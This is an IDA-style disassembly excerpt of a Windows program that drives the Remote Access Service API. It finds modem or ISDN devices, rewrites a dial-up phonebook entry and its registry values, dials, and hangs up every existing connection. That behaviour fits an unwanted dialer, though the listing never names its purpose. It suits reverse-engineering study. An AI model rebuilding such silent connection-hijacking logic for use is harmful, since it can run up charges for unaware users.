; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409450(HINSTANCE hInstance,UINT uID)
sub_409450 proc near ; CODE XREF: sub_4057D0+10�p
String2 = byte ptr -400h
hInstance = dword ptr 4
uID = dword ptr 8
mov edx, [esp+hInstance]
sub esp, 400h
lea eax, [esp+400h+String2]
push esi
mov esi, ecx
mov ecx, [esp+404h+uID]
push 400h ; cchBufferMax
push eax ; lpBuffer
push ecx ; uID
push edx ; hInstance
call ds:LoadStringA ; LoadStringA
test eax, eax
jnz short loc_409486
xor al, al
pop esi
add esp, 400h
retn 8
; ---------------------------------------------------------------------------
loc_409486: ; CODE XREF: sub_409450+28�j
lea eax, [esp+404h+String2]
mov ecx, esi
push eax ; lpString2
call sub_409430
pop esi
add esp, 400h
retn 8
sub_409450 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4094A0 proc near ; CODE XREF: sub_405C90+22A�p
push esi
mov esi, ecx
call sub_4094B0
mov eax, esi
pop esi
retn
sub_4094A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4094B0 proc near ; CODE XREF: sub_4094A0+3�p
xor eax, eax
lea edx, [ecx+94h]
push edi
mov [ecx+5F4h], eax
mov [ecx+5F8h], eax
mov [ecx+5D0h], eax
mov [ecx], eax
mov [ecx+90h], eax
mov [ecx+8Ch], eax
mov [ecx+4B0h], eax
mov [ecx+4], al
mov [ecx+9], al
mov [ecx+5C4h], eax
mov [ecx+5CCh], eax
mov [ecx+5C8h], eax
mov [ecx+5BCh], eax
mov [ecx+5B8h], eax
mov [ecx+4B5h], al
mov [ecx+4B4h], al
mov ecx, 107h
mov edi, edx
rep stosd
mov dword ptr [edx], 41Ch
pop edi
retn
sub_4094B0 endp
; =============== S U B R O U T I N E =======================================
sub_409520 proc near ; CODE XREF: sub_405C90+23A�p
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_409530
push eax ; hLibModule
call ds:FreeLibrary ; FreeLibrary
loc_409530: ; CODE XREF: sub_409520+7�j
push offset aRasapi32_dll ; "RASAPI32.DLL"
call ds:LoadLibraryA ; LoadLibraryA
test eax, eax
mov [esi], eax
jz loc_40963D
push edi
mov edi, ds:GetProcAddress
push offset aRasenumdevices ; "RasEnumDevicesA"
push eax ; hModule
call edi ; GetProcAddress
mov [esi+5D0h], eax
mov eax, [esi]
push offset aRasdiala ; "RasDialA"
push eax ; hModule
call edi ; GetProcAddress
mov ecx, [esi]
push offset aRasgeterrorstr ; "RasGetErrorStringA"
push ecx ; hModule
mov [esi+5D4h], eax
call edi ; GetProcAddress
mov edx, [esi]
push offset aRasgetentrypro ; "RasGetEntryPropertiesA"
push edx ; hModule
mov [esi+5D8h], eax
call edi ; GetProcAddress
mov [esi+5DCh], eax
mov eax, [esi]
push offset aRassetentrypro ; "RasSetEntryPropertiesA"
push eax ; hModule
call edi ; GetProcAddress
mov ecx, [esi]
push offset aRashangupa ; "RasHangUpA"
push ecx ; hModule
mov [esi+5E0h], eax
call edi ; GetProcAddress
mov edx, [esi]
push offset aRasenumconnect ; "RasEnumConnectionsA"
push edx ; hModule
mov [esi+5E4h], eax
call edi ; GetProcAddress
mov [esi+5E8h], eax
mov eax, [esi]
push offset aRasgetconnects ; "RasGetConnectStatusA"
push eax ; hModule
call edi ; GetProcAddress
mov ecx, [esi]
push offset aRassetentrydia ; "RasSetEntryDialParamsA"
push ecx ; hModule
mov [esi+5ECh], eax
call edi ; GetProcAddress
mov ecx, [esi+5D0h]
mov [esi+5F0h], eax
test ecx, ecx
pop edi
jz short loc_40963D
mov ecx, [esi+5D4h]
test ecx, ecx
jz short loc_40963D
mov ecx, [esi+5D8h]
test ecx, ecx
jz short loc_40963D
mov ecx, [esi+5DCh]
test ecx, ecx
jz short loc_40963D
mov ecx, [esi+5E0h]
test ecx, ecx
jz short loc_40963D
mov ecx, [esi+5E4h]
test ecx, ecx
jz short loc_40963D
mov ecx, [esi+5E8h]
test ecx, ecx
jz short loc_40963D
mov ecx, [esi+5ECh]
test ecx, ecx
jz short loc_40963D
test eax, eax
jz short loc_40963D
mov ecx, esi
call sub_409650
test eax, eax
setz al
pop esi
retn
; ---------------------------------------------------------------------------
loc_40963D: ; CODE XREF: sub_409520+1F�j
; sub_409520+C3�j ...
xor al, al
pop esi
retn
sub_409520 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409650 proc near ; CODE XREF: sub_409520+111�p
dwBytes = dword ptr -8
var_4 = dword ptr -4
sub esp, 8
push esi
mov esi, ecx
push edi
xor edi, edi
mov eax, [esi+5D0h]
mov [esi+5F4h], edi
cmp eax, edi
mov [esi+5F8h], edi
jnz short loc_409678
pop edi
or eax, 0FFFFFFFFh
pop esi
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_409678: ; CODE XREF: sub_409650+1D�j
lea ecx, [esp+10h+var_4]
lea edx, [esp+10h+dwBytes]
push ecx
push edx
push edi
mov [esp+1Ch+dwBytes], edi
call eax
cmp [esp+10h+var_4], edi
jnz short loc_409698
pop edi
or eax, 0FFFFFFFFh
pop esi
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_409698: ; CODE XREF: sub_409650+3D�j
mov eax, [esp+10h+dwBytes]
push eax ; dwBytes
call sub_40AE50
add esp, 4
cmp eax, edi
mov [esi+5F8h], eax
jnz short loc_4096BA
pop edi
mov eax, 298h
pop esi
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_4096BA: ; CODE XREF: sub_409650+5D�j
lea ecx, [esp+10h+var_4]
mov dword ptr [eax], 98h
mov eax, [esi+5F8h]
lea edx, [esp+10h+dwBytes]
push ecx
push edx
push eax
call dword ptr [esi+5D0h]
test eax, eax
jz short loc_4096F0
mov ecx, [esi+5F8h]
push ecx ; lpMem
call sub_40AF60
add esp, 4
mov [esi+5F8h], edi
loc_4096F0: ; CODE XREF: sub_409650+89�j
mov edx, [esp+10h+var_4]
pop edi
mov [esi+5F4h], edx
xor eax, eax
pop esi
add esp, 8
retn
sub_409650 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409710 proc near ; CODE XREF: sub_405C90+570�p
mov eax, [ecx+5F4h]
retn
sub_409710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409720 proc near ; CODE XREF: sub_405C90+67F�p
; sub_405C90+6E4�p ...
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+arg_0]
push esi
push edi
mov esi, ecx
push ebp
call sub_4097B0
mov edi, eax
test edi, edi
jz short loc_409775
mov ebx, ds:lstrcmpA
push offset aModem ; "modem"
push edi ; lpString1
call ebx ; lstrcmpA
test eax, eax
jz short loc_409754
push offset aIsdn ; "isdn"
push edi ; lpString1
call ebx ; lstrcmpA
test eax, eax
jnz short loc_409775
loc_409754: ; CODE XREF: sub_409720+26�j
push ebp
mov ecx, esi
call sub_409780
push eax ; lpString2
mov ecx, esi
call sub_409B90
push edi ; lpString2
mov ecx, esi
call sub_409BB0
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_409775: ; CODE XREF: sub_409720+14�j
; sub_409720+32�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 4
sub_409720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409780 proc near ; CODE XREF: sub_405C90+645�p
; sub_409720+37�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jl short loc_4097A3
cmp eax, [ecx+5F4h]
jge short loc_4097A3
mov ecx, [ecx+5F8h]
lea edx, [eax+eax*8]
lea eax, [eax+edx*2]
lea eax, [ecx+eax*8+15h]
retn 4
; ---------------------------------------------------------------------------
loc_4097A3: ; CODE XREF: sub_409780+6�j
; sub_409780+E�j
xor eax, eax
retn 4
sub_409780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4097B0 proc near ; CODE XREF: sub_405C90+610�p
; sub_409720+B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jl short loc_4097D3
cmp eax, [ecx+5F4h]
jge short loc_4097D3
mov ecx, [ecx+5F8h]
lea edx, [eax+eax*8]
lea eax, [eax+edx*2]
lea eax, [ecx+eax*8+4]
retn 4
; ---------------------------------------------------------------------------
loc_4097D3: ; CODE XREF: sub_4097B0+6�j
; sub_4097B0+E�j
xor eax, eax
retn 4
sub_4097B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_4097E0(LPCSTR lpString1)
sub_4097E0 proc near ; CODE XREF: sub_406D50+45�p
lpString1 = dword ptr 4
push ebx
push ebp
push esi
mov esi, ecx
xor ebx, ebx
push edi
mov eax, [esi+5F4h]
test eax, eax
jle short loc_40981F
mov ebp, [esp+10h+lpString1]
xor edi, edi
loc_4097F8: ; CODE XREF: sub_4097E0+3D�j
mov eax, [esi+5F8h]
lea ecx, [edi+eax+15h]
push ecx ; lpString2
push ebp ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz short loc_409829
mov eax, [esi+5F4h]
inc ebx
add edi, 98h
cmp ebx, eax
jl short loc_4097F8
loc_40981F: ; CODE XREF: sub_4097E0+10�j
pop edi
pop esi
pop ebp
or eax, 0FFFFFFFFh
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_409829: ; CODE XREF: sub_4097E0+2C�j
pop edi
pop esi
mov eax, ebx
pop ebp
pop ebx
retn 4
sub_4097E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409840(LPCSTR lpString2)
sub_409840 proc near ; CODE XREF: sub_405C90+4C2�p
lpString2 = dword ptr 4
push ebx
push ebp
push esi
mov esi, ecx
push edi
mov eax, [esi+5DCh]
test eax, eax
jnz short loc_40985C
pop edi
pop esi
pop ebp
mov eax, 278h
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_40985C: ; CODE XREF: sub_409840+E�j
mov eax, [esi+8Ch]
test eax, eax
jz short loc_409879
push eax ; lpMem
call sub_40AF10
add esp, 4
mov dword ptr [esi+8Ch], 0
loc_409879: ; CODE XREF: sub_409840+24�j
mov eax, [esp+10h+lpString2]
lea ebp, [esi+98h]
push 101h ; iMaxLength
push eax ; lpString2
push ebp ; lpString1
call ds:lstrcpynA ; lstrcpynA
lea ebx, [esi+90h]
push 0
push 0
push ebx
push 0
push ebp
push 0
mov dword ptr [ebx], 0
call dword ptr [esi+5DCh]
test eax, eax
jz short loc_4098DE
push 0
push 0
push ebx
push 0
push offset dword_40FBD8
push 0
mov dword ptr [ebx], 0
call dword ptr [esi+5DCh]
cmp eax, 25Bh
jz short loc_4098DE
pop edi
pop esi
mov dword ptr [ebx], 0
pop ebp
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_4098DE: ; CODE XREF: sub_409840+6E�j
; sub_409840+8F�j
mov ecx, [ebx]
push ecx ; dwBytes
call sub_40AE50
mov edi, eax
add esp, 4
test edi, edi
mov [esi+8Ch], edi
jnz short loc_409903
pop edi
pop esi
mov [ebx], eax
pop ebp
mov eax, 298h
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_409903: ; CODE XREF: sub_409840+B3�j
mov ecx, [ebx]
xor eax, eax
mov edx, ecx
push 0
shr ecx, 2
rep stosd
mov ecx, edx
push 0
and ecx, 3
push ebx
rep stosb
mov eax, [esi+8Ch]
mov ecx, [ebx]
mov [eax], ecx
mov edx, [esi+8Ch]
push edx
push ebp
push 0
call dword ptr [esi+5DCh]
test eax, eax
jz short loc_40997F
mov eax, [esi+8Ch]
push 0
push 0
push ebx
push eax
push offset dword_40FBD8
push 0
call dword ptr [esi+5DCh]
mov edi, eax
test edi, edi
jz short loc_40997F
mov ecx, [esi+8Ch]
push ecx ; lpMem
call sub_40AF10
add esp, 4
mov eax, edi
mov dword ptr [esi+8Ch], 0
mov dword ptr [ebx], 0
pop edi
pop esi
pop ebp
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_40997F: ; CODE XREF: sub_409840+F6�j
; sub_409840+115�j
mov edx, [esi+8Ch]
push 81h ; iMaxLength
push offset asc_40F704 ; " "
mov dword ptr [edx+4], 218h
mov eax, [esi+8Ch]
mov dword ptr [eax+0B8h], 4
mov ecx, [esi+8Ch]
mov dword ptr [ecx+0BCh], 1
mov edx, [esi+8Ch]
add edx, 1Bh
push edx ; lpString1
call ds:lstrcpynA ; lstrcpynA
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn 4
sub_409840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4099D0 proc near ; CODE XREF: sub_405C90+7BB�p
; sub_406720+1BD�p ...
bstrString = dword ptr -3Ch
lpMem = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
lpString = dword ptr -4
push ebp
mov ebp, esp
sub esp, 3Ch
push ebx
push esi
mov esi, ecx
push edi
mov [ebp+var_8], esi
mov al, [esi+4B5h]
test al, al
jz loc_409B48
xor eax, eax
lea edi, [esi+98h]
cmp edi, eax
mov [ebp+bstrString], eax
mov [ebp+lpMem], eax
mov [ebp+var_34], eax
mov [ebp+var_30], al
mov [ebp+var_12], al
jnz short loc_409A0C
mov [ebp+lpString], eax
jmp short loc_409A3F
; ---------------------------------------------------------------------------
loc_409A0C: ; CODE XREF: sub_4099D0+35�j
push edi ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push edi ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov esi, [ebp+var_8]
mov [ebp+lpString], ebx
loc_409A3F: ; CODE XREF: sub_4099D0+3A�j
mov eax, [ebp+lpString]
push eax ; lpString
call ds:lstrlenW ; lstrlenW
mov ebx, eax
mov eax, [ebp+bstrString]
test eax, eax
mov [ebp+var_C], ebx
jnz short loc_409A59
xor edi, edi
jmp short loc_409A62
; ---------------------------------------------------------------------------
loc_409A59: ; CODE XREF: sub_4099D0+83�j
push eax ; BSTR
call ds:SysStringLen
mov edi, eax
loc_409A62: ; CODE XREF: sub_4099D0+87�j
lea eax, [edi+ebx]
push eax ; ui
push 0 ; strIn
mov [ebp+var_10], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_409AC1
mov esi, [ebp+bstrString]
lea eax, [edi+edi]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_C]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_10]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov word ptr [ebx+eax*2], 0
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
mov esi, [ebp+var_8]
mov [ebp+bstrString], ebx
loc_409AC1: ; CODE XREF: sub_4099D0+A5�j
mov edx, lpValueName
mov eax, lpSubKey
push 1 ; hKey
push edx ; lpValueName
push eax ; lpSubKey
lea ecx, [ebp+bstrString]
call sub_40ABF0
mov ecx, off_40F27C
mov edx, lpSubKey
push 1 ; hKey
push ecx ; lpValueName
push edx ; lpSubKey
lea ecx, [ebp+bstrString]
call sub_40ABF0
mov al, [esi+4B4h]
test al, al
jz short loc_409B27
mov ecx, [esi+8Ch]
lea eax, [esi+199h]
push 80h ; iMaxLength
add ecx, 1Bh
push eax ; lpString2
push ecx ; lpString1
call ds:lstrcpynA ; lstrcpynA
lea edx, [esi+94h]
push 0
push edx
push 0
call dword ptr [esi+5F0h]
loc_409B27: ; CODE XREF: sub_4099D0+128�j
mov eax, [ebp+lpMem]
test eax, eax
jz short loc_409B3E
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], 0
loc_409B3E: ; CODE XREF: sub_4099D0+15C�j
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
loc_409B48: ; CODE XREF: sub_4099D0+16�j
mov ecx, [esi+90h]
mov edx, [esi+8Ch]
push 0
push 0
push ecx
lea eax, [esi+98h]
push edx
push eax
push 0
call dword ptr [esi+5E0h]
lea esp, [ebp-48h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4099D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409B80 proc near ; CODE XREF: sub_405C90+562�p
; sub_405C90+68A�p ...
mov eax, [ecx+8Ch]
add eax, 3DDh
retn
sub_409B80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409B90(LPCSTR lpString2)
sub_409B90 proc near ; CODE XREF: sub_409720+3F�p
lpString2 = dword ptr 4
mov ecx, [ecx+8Ch]
mov eax, [esp+lpString2]
push 81h ; iMaxLength
add ecx, 3DDh
push eax ; lpString2
push ecx ; lpString1
call ds:lstrcpynA ; lstrcpynA
retn 4
sub_409B90 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409BB0(LPCSTR lpString2)
sub_409BB0 proc near ; CODE XREF: sub_409720+47�p
lpString2 = dword ptr 4
mov ecx, [ecx+8Ch]
mov eax, [esp+lpString2]
push 11h ; iMaxLength
add ecx, 3CCh
push eax ; lpString2
push ecx ; lpString1
call ds:lstrcpynA ; lstrcpynA
retn 4
sub_409BB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409BD0 proc near ; CODE XREF: sub_409C20+16�p
; sub_409C40+19�p
push ebx
push esi
mov esi, ecx
push edi
lea ebx, [esi+4]
lea edi, [esi+199h]
push ebx ; lpString2
push edi ; lpString1
call ds:lstrcpyA ; lstrcpyA
push ebx ; lpString
call ds:lstrlenA ; lstrlenA
mov ebx, ds:lstrcatA
test eax, eax
jle short loc_409BFF
push offset asc_40F708 ; ","
push edi ; lpString1
call ebx ; lstrcatA
loc_409BFF: ; CODE XREF: sub_409BD0+25�j
add esi, 9
push esi ; lpString2
push edi ; lpString1
call ebx ; lstrcatA
pop edi
pop esi
pop ebx
retn
sub_409BD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409C10 proc near ; CODE XREF: sub_405C90+72F�p
lea eax, [ecx+4]
retn
sub_409C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409C20(LPCSTR lpString2)
sub_409C20 proc near ; CODE XREF: sub_405830+287�p
; sub_406E00+27�p ...
lpString2 = dword ptr 4
mov eax, [esp+lpString2]
push esi
mov esi, ecx
push 4 ; iMaxLength
push eax ; lpString2
lea ecx, [esi+4]
push ecx ; lpString1
call ds:lstrcpynA ; lstrcpynA
mov ecx, esi
call sub_409BD0
pop esi
retn 4
sub_409C20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409C40(LPCSTR lpString2)
sub_409C40 proc near ; CODE XREF: sub_405830+29C�p
; sub_406720+49D�p ...
lpString2 = dword ptr 4
mov eax, [esp+lpString2]
push esi
mov esi, ecx
push 80h ; iMaxLength
push eax ; lpString2
lea ecx, [esi+9]
push ecx ; lpString1
call ds:lstrcpynA ; lstrcpynA
mov ecx, esi
call sub_409BD0
pop esi
retn 4
sub_409C40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409C70(LPCSTR lpString2)
sub_409C70 proc near ; CODE XREF: sub_405830+262�p
; sub_406720+473�p ...
lpString2 = dword ptr 4
mov eax, [esp+lpString2]
push 100h ; iMaxLength
add ecx, 29Bh
push eax ; lpString2
push ecx ; lpString1
call ds:lstrcpynA ; lstrcpynA
retn 4
sub_409C70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_409C90(LPCSTR lpString2)
sub_409C90 proc near ; CODE XREF: sub_405830+277�p
; sub_406720+488�p ...
lpString2 = dword ptr 4
mov eax, [esp+lpString2]
push 100h ; iMaxLength
add ecx, 39Ch
push eax ; lpString2
push ecx ; lpString1
call ds:lstrcpynA ; lstrcpynA
retn 4
sub_409C90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409CB0 proc near ; CODE XREF: .text:00409D90�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [ecx+5B8h]
inc eax
cmp eax, 20h
jl short loc_409CBE
xor eax, eax
loc_409CBE: ; CODE XREF: sub_409CB0+A�j
mov edx, [esp+arg_0]
mov [ecx+eax*8+4B8h], edx
mov edx, [esp+arg_4]
mov [ecx+eax*8+4BCh], edx
mov [ecx+5B8h], eax
retn 8
sub_409CB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409CE0 proc near ; CODE XREF: sub_406720+217�p
var_4 = byte ptr -4
push ecx
push esi
mov esi, ecx
push 0BB8h
call sub_409F90
lea eax, [esp+8+var_4]
mov ecx, esi
push eax
call sub_409DA0
cmp eax, 2001h
jz short loc_409D20
push edi
mov edi, ds:Sleep
loc_409D08: ; CODE XREF: sub_409CE0+3D�j
push 1 ; dwMilliseconds
call edi ; Sleep
lea ecx, [esp+0Ch+var_4]
push ecx
mov ecx, esi
call sub_409DA0
cmp eax, 2001h
jnz short loc_409D08
pop edi
loc_409D20: ; CODE XREF: sub_409CE0+1F�j
lea edx, [esi+4B0h]
xor eax, eax
push edx
push offset loc_409D80
lea ecx, [esi+94h]
push eax
push ecx
mov dword ptr [esi+5C4h], 1
mov [esi+5C8h], eax
mov [esi+5CCh], eax
push eax
mov dword_40FBDC, esi
push eax
mov [esi+5BCh], eax
mov [esi+5B8h], eax
mov dword ptr [esi+5C0h], 0FFFFFFFFh
call dword ptr [esi+5D4h]
pop esi
pop ecx
retn
sub_409CE0 endp
; ---------------------------------------------------------------------------
align 10h
loc_409D80: ; DATA XREF: sub_409CE0+49�o
mov eax, [esp+0Ch]
mov ecx, [esp+8]
push eax
push ecx
mov ecx, dword_40FBDC
call sub_409CB0
retn 0Ch
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409DA0 proc near ; CODE XREF: sub_406720+10E�p
; sub_406720+170�p ...
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
arg_0 = dword ptr 4
sub esp, 0A0h
push esi
mov esi, ecx
push edi
mov eax, [esi+5BCh]
mov ecx, [esi+5B8h]
cmp ecx, eax
jz loc_409E42
inc eax
cmp eax, 20h
jl short loc_409DC6
xor eax, eax
loc_409DC6: ; CODE XREF: sub_409DA0+22�j
mov edx, [esp+0A8h+arg_0]
mov ecx, [esi+eax*8+4BCh]
mov [edx], ecx
mov edi, [esi+eax*8+4B8h]
mov [esi+5C0h], eax
mov [esi+5BCh], eax
mov eax, edi
sub eax, 2000h
jz short loc_409E2E
dec eax
jnz short loc_409E35
mov eax, [esi+5C4h]
test eax, eax
jz short loc_409E35
cmp eax, 2
jnz short loc_409E0B
call sub_40B4C8
jmp short loc_409E11
; ---------------------------------------------------------------------------
loc_409E0B: ; CODE XREF: sub_409DA0+62�j
mov eax, [esi+5C8h]
loc_409E11: ; CODE XREF: sub_409DA0+69�j
mov [esi+5CCh], eax
mov eax, edi
mov dword ptr [esi+5C4h], 0
pop edi
pop esi
add esp, 0A0h
retn 4
; ---------------------------------------------------------------------------
loc_409E2E: ; CODE XREF: sub_409DA0+50�j
mov byte ptr [esi+4B4h], 1
loc_409E35: ; CODE XREF: sub_409DA0+53�j
; sub_409DA0+5D�j
mov eax, edi
pop edi
pop esi
add esp, 0A0h
retn 4
; ---------------------------------------------------------------------------
loc_409E42: ; CODE XREF: sub_409DA0+18�j
mov ecx, [esi+4B0h]
test ecx, ecx
jnz short loc_409E69
mov ecx, [esp+0A8h+arg_0]
pop edi
mov eax, 2001h
pop esi
mov dword ptr [ecx], 0
add esp, 0A0h
retn 4
; ---------------------------------------------------------------------------
loc_409E69: ; CODE XREF: sub_409DA0+AA�j
test eax, eax
jge short loc_409E8A
mov edx, [esp+0A8h+arg_0]
pop edi
mov eax, 2001h
pop esi
mov dword ptr [edx], 0
add esp, 0A0h
retn 4
; ---------------------------------------------------------------------------
loc_409E8A: ; CODE XREF: sub_409DA0+CB�j
mov eax, [esi+5C0h]
mov edi, [esp+0A8h+arg_0]
mov ecx, [esi+eax*8+4BCh]
mov [edi], ecx
mov edx, [esi+5C0h]
mov eax, [esi+edx*8+4B8h]
cmp eax, 2000h
jz short loc_409EC3
cmp eax, 2001h
jz short loc_409EC3
test ecx, ecx
jz loc_409F7C
loc_409EC3: ; CODE XREF: sub_409DA0+112�j
; sub_409DA0+119�j
mov ecx, [esi+4B0h]
lea eax, [esp+0A8h+var_A0]
push eax
push ecx
mov [esp+0B0h+var_A0], 0A0h
call dword ptr [esi+5ECh]
cmp eax, 6
jnz short loc_409F41
push 0BB8h
mov ecx, esi
call sub_409F90
mov eax, [esi+4B0h]
test eax, eax
jz short loc_409F02
mov dword ptr [esi+4B0h], 0
loc_409F02: ; CODE XREF: sub_409DA0+156�j
cmp dword ptr [esi+5C4h], 3
jnz short loc_409F21
mov edx, [esi+5C8h]
mov dword ptr [esi+5C4h], 0
mov [esi+5CCh], edx
loc_409F21: ; CODE XREF: sub_409DA0+169�j
mov dword ptr [esi+5C0h], 0FFFFFFFFh
mov dword ptr [edi], 0
pop edi
mov eax, 2001h
pop esi
add esp, 0A0h
retn 4
; ---------------------------------------------------------------------------
loc_409F41: ; CODE XREF: sub_409DA0+140�j
cmp dword ptr [esi+5C4h], 1
jnz short loc_409F6A
mov eax, [esp+0A8h+var_9C]
cmp eax, 2000h
jnz short loc_409F7C
call sub_40B4C8
mov [esi+5C8h], eax
mov dword ptr [esi+5C4h], 2
loc_409F6A: ; CODE XREF: sub_409DA0+1A8�j
mov eax, [esp+0A8h+var_9C]
cmp eax, 2000h
jnz short loc_409F7C
mov byte ptr [esi+4B4h], 1
loc_409F7C: ; CODE XREF: sub_409DA0+11D�j
; sub_409DA0+1B3�j ...
pop edi
pop esi
add esp, 0A0h
retn 4
sub_409DA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409F90 proc near ; CODE XREF: sub_406720+50�p
; sub_406720+148�p ...
var_A0 = dword ptr -0A0h
arg_0 = dword ptr 4
sub esp, 0A0h
push ebp
push esi
mov esi, ecx
push edi
mov eax, [esi+4B0h]
mov dword ptr [esi+5C0h], 0FFFFFFFFh
test eax, eax
jz short loc_40A016
push eax
call dword ptr [esi+5E4h]
mov ecx, [esi+4B0h]
lea eax, [esp+0ACh+var_A0]
push eax
push ecx
mov [esp+0B4h+var_A0], 0A0h
call dword ptr [esi+5ECh]
cmp eax, 6
jz short loc_40A00C
mov edi, ds:Sleep
mov ebp, [esp+0ACh+arg_0]
loc_409FE2: ; CODE XREF: sub_409F90+7A�j
mov edx, ebp
dec ebp
test edx, edx
jz short loc_40A016
push 1 ; dwMilliseconds
call edi ; Sleep
mov ecx, [esi+4B0h]
lea eax, [esp+0ACh+var_A0]
push eax
push ecx
mov [esp+0B4h+var_A0], 0A0h
call dword ptr [esi+5ECh]
cmp eax, 6
jnz short loc_409FE2
loc_40A00C: ; CODE XREF: sub_409F90+43�j
mov dword ptr [esi+4B0h], 0
loc_40A016: ; CODE XREF: sub_409F90+1D�j
; sub_409F90+57�j
pop edi
pop esi
pop ebp
add esp, 0A0h
retn 4
sub_409F90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A030 proc near ; CODE XREF: sub_406720+BE�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, 19C8h
call sub_40AF70
push ebx
mov ebx, ecx
lea eax, [esp+4]
lea ecx, [esp+4+arg_0]
push eax
lea edx, [esp+8+arg_4]
push ecx
push edx
mov [esp+10h+arg_0], 19C0h
mov [esp+10h+arg_4], 19Ch
call dword ptr [ebx+5E8h]
test eax, eax
jz short loc_40A070
xor al, al
pop ebx
add esp, 19C8h
retn
; ---------------------------------------------------------------------------
loc_40A070: ; CODE XREF: sub_40A030+34�j
mov eax, [esp+10h+var_C]
push esi
xor esi, esi
test eax, eax
jbe short loc_40A099
push edi
lea edi, [esp+18h]
loc_40A080: ; CODE XREF: sub_40A030+66�j
mov eax, [edi]
push eax
call dword ptr [ebx+5E4h]
mov eax, [esp+1Ch+var_10]
inc esi
add edi, 19Ch
cmp esi, eax
jb short loc_40A080
pop edi
loc_40A099: ; CODE XREF: sub_40A030+49�j
pop esi
mov al, 1
pop ebx
add esp, 19C8h
retn
sub_40A030 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A0B0 proc near ; CODE XREF: sub_406720+26�p
; sub_406720+4FD�p
push esi
mov esi, ecx
mov eax, [esi+5C4h]
test eax, eax
jz short loc_40A0EF
cmp eax, 1
jle short loc_40A0EB
cmp eax, 3
jg short loc_40A0EB
call sub_40B4C8
mov edx, [esi+5C8h]
